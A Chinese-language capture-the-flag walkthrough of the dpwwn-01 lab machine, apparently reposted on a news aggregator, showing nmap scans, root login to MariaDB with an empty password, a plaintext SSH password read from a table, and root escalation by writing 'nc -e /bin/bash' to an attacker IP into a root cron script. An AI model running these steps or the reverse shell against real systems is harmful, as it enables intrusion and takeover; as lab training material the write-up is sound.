当前位置：首页 > news >正文

dpwwn-01

news 2026/3/26 17:19:54

主机发现

主机发现
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.92.0/24
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-05 01:39 EST
Nmap scan report for 192.168.92.1
Host is up (0.00015s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.92.2
Host is up (0.00017s latency).
MAC Address: 00:50:56:E9:BE:0B (VMware)
Nmap scan report for 192.168.92.146
Host is up (0.00030s latency).
MAC Address: 00:0C:29:8F:3C:9F (VMware)
Nmap scan report for 192.168.92.254
Host is up (0.00036s latency).
MAC Address: 00:50:56:E0:A6:00 (VMware)
Nmap scan report for 192.168.92.130
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 17.08 seconds
端口探测                                                                                                                             
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.92.146  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-05 01:41 EST
Nmap scan report for 192.168.92.146
Host is up (0.0012s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:8F:3C:9F (VMware)Nmap done: 1 IP address (1 host up) scanned in 13.08 secondstcp扫描┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80,3306 192.168.92.146
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-05 01:42 EST
Nmap scan report for 192.168.92.146
Host is up (0.0019s latency).PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 c1:d3:be:39:42:9d:5c:b4:95:2c:5b:2e:20:59:0e:3a (RSA)
|   256 43:4a:c6:10:e7:17:7d:a0:c0:c3:76:88:1d:43:a1:8c (ECDSA)
|_  256 0e:cc:e3:e1:f7:87:73:a1:03:47:b9:e2:cf:1c:93:15 (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Apache HTTP Server Test Page powered by CentOS
| http-methods: 
|_  Potentially risky methods: TRACE
3306/tcp open  mysql   MySQL 5.5.60-MariaDB
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.60-MariaDB
|   Thread ID: 5
|   Capabilities flags: 63487
|   Some Capabilities: FoundRows, InteractiveClient, Speaks41ProtocolOld, IgnoreSigpipes, LongColumnFlag, SupportsTransactions, IgnoreSpaceBeforeParenthesis, SupportsCompression, SupportsLoadDataLocal, ConnectWithDatabase, ODBCClient, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, LongPassword, Support41Auth, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
|   Status: Autocommit
|   Salt: (SL`"$.YV$L7j3\W"?Un
|_  Auth Plugin Name: mysql_native_password
MAC Address: 00:0C:29:8F:3C:9F (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hopOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.54 seconds
udp扫描                                                                                                                             
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --top-ports 20 192.168.92.146         
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-05 01:42 EST
Nmap scan report for 192.168.92.146
Host is up (0.00094s latency).PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    open|filtered dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   closed        ntp
135/udp   open|filtered msrpc
137/udp   closed        netbios-ns
138/udp   closed        netbios-dgm
139/udp   open|filtered netbios-ssn
161/udp   open|filtered snmp
162/udp   open|filtered snmptrap
445/udp   closed        microsoft-ds
500/udp   open|filtered isakmp
514/udp   open|filtered syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  closed        ms-sql-m
1900/udp  closed        upnp
4500/udp  open|filtered nat-t-ike
49152/udp closed        unknown
MAC Address: 00:0C:29:8F:3C:9F (VMware)Nmap done: 1 IP address (1 host up) scanned in 12.39 seconds
脚本扫描                                                                                                                             
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80,3306 192.168.92.146
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-05 01:43 EST
Nmap scan report for 192.168.92.146
Host is up (0.0011s latency).PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /info.php: Possible information file
|_  /icons/: Potentially interesting folder w/ directory listing
3306/tcp open  mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:8F:3C:9F (VMware)Nmap done: 1 IP address (1 host up) scanned in 36.25 seconds

3306端口

随便试了一下，发现是空密码

mysql空密码

┌──(kali㉿kali)-[~/redteamnotes/dpwwn]
└─$ sudo mysql -h 192.168.92.146 -uroot -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 2
Server version: 5.5.60-MariaDB MariaDB ServerCopyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.MariaDB [(none)]> ls-> -> -> -> -> Ctrl-C -- exit!
Aborted┌──(kali㉿kali)-[~/redteamnotes/dpwwn]
└─$ sudo mysql -h 192.168.92.146 -uroot -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 3
Server version: 5.5.60-MariaDB MariaDB ServerCopyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.MariaDB [(none)]> show databases-> ;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| ssh                |
+--------------------+
4 rows in set (0.012 sec)MariaDB [(none)]> use ssh
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -ADatabase changed
MariaDB [ssh]> show tables-> ;
+---------------+
| Tables_in_ssh |
+---------------+
| users         |
+---------------+
1 row in set (0.002 sec)

明文储存

MariaDB [ssh]> use users;
ERROR 1049 (42000): Unknown database 'users'
MariaDB [ssh]> select * form users;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'form users' at line 1
MariaDB [ssh]> select * from users;
+----+----------+---------------------+
| id | username | password            |
+----+----------+---------------------+
|  1 | mistic   | testP@$$swordmistic |
+----+----------+---------------------+
1 row in set (0.008 sec)MariaDB [ssh]> exit
Bye

ssh连接

┌──(kali㉿kali)-[~/redteamnotes/dpwwn]
└─$ sudo ssh mistic@192.168.92.146
The authenticity of host '192.168.92.146 (192.168.92.146)' can't be established.
ED25519 key fingerprint is SHA256:gk40nSGfkMrCYAeMyL2l9aCwV/VL5i5mWKrFfowOfH0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.92.146' (ED25519) to the list of known hosts.
mistic@192.168.92.146's password: 
Last login: Thu Aug  1 14:41:37 2019 from 192.168.30.145
[mistic@dpwwn-01 ~]$

[mistic@dpwwn-01 ~]$ whoami
mistic
[mistic@dpwwn-01 ~]$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host lovalid_lft forever preferred_lft foreverinet6 ::1/128 scope host valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000link/ether 00:0c:29:8f:3c:9f brd ff:ff:ff:ff:ff:ffinet 192.168.92.146/24 brd 192.168.92.255 scope global noprefixroute dynamic ens33valid_lft 1470sec preferred_lft 1470secinet6 fe80::20c:29ff:fe8f:3c9f/64 scope link valid_lft forever preferred_lft forever
[mistic@dpwwn-01 ~]$ uname -a
Linux dpwwn-01 3.10.0-957.el7.centos.plus.i686 #1 SMP Wed Nov 7 19:17:19 UTC 2018 i686 i686 i386 GNU/Linux
[mistic@dpwwn-01 ~]$ ls
logrot.sh
[mistic@dpwwn-01 ~]$ ls -laih
总用量 16K
2536099 drwx------. 2 mistic mistic 100 8月   1 2019 .79 drwxr-xr-x. 3 root   root    20 8月   1 2019 ..
2536125 -rw-------. 1 mistic mistic   0 8月   1 2019 .bash_history
2536100 -rw-r--r--. 1 mistic mistic  18 10月 30 2018 .bash_logout
2536101 -rw-r--r--. 1 mistic mistic 193 10月 30 2018 .bash_profile
2536102 -rw-r--r--. 1 mistic mistic 231 10月 30 2018 .bashrc
2536126 -rwx------. 1 mistic mistic 186 8月   1 2019 logrot.sh
[mistic@dpwwn-01 ~]$ cat .bash_history 
[mistic@dpwwn-01 ~]$ cat logrot.sh 
#!/bin/bash
#
#LOGFILE="/var/tmp"
#SEMAPHORE="/var/tmp.semaphore"while : ; doread linewhile [[ -f $SEMAPHORE ]]; dosleep 1sdoneprintf "%s\n" "$line" >> $LOGFILE
done

crontab提权

[[crontab⽂件权限提权]]

[mistic@dpwwn-01 ~]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root# For details see man 4 crontabs# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed*/3 *  * * *  root  /home/mistic/logrot.sh
[mistic@dpwwn-01 ~]$ vi logrot.sh 
[mistic@dpwwn-01 ~]$ cat logrot.sh 
nc -e /bin/bash 192.168.92.130 1234
#!/bin/bash
[mistic@dpwwn-01 ~]$ 
┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 1234                  
[sudo] kali 的密码：
listening on [any] 1234 ...
connect to [192.168.92.130] from (UNKNOWN) [192.168.92.146] 49408ls
anaconda-ks.cfg
dpwwn-01-FLAG.txt
whoami
root
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host lovalid_lft forever preferred_lft foreverinet6 ::1/128 scope host valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000link/ether 00:0c:29:8f:3c:9f brd ff:ff:ff:ff:ff:ffinet 192.168.92.146/24 brd 192.168.92.255 scope global noprefixroute dynamic ens33valid_lft 1119sec preferred_lft 1119secinet6 fe80::20c:29ff:fe8f:3c9f/64 scope link valid_lft forever preferred_lft forever
cat dpwwn-01-FLAG.txtCongratulation! I knew you can pwn it as this very easy challenge. Thank you. 64445777
6e643634 
37303737 
37373665 
36347077 
776e6450 
4077246e
33373336 
36359090
搞定收工

查看全文

http://www.jsqmd.com/news/338410/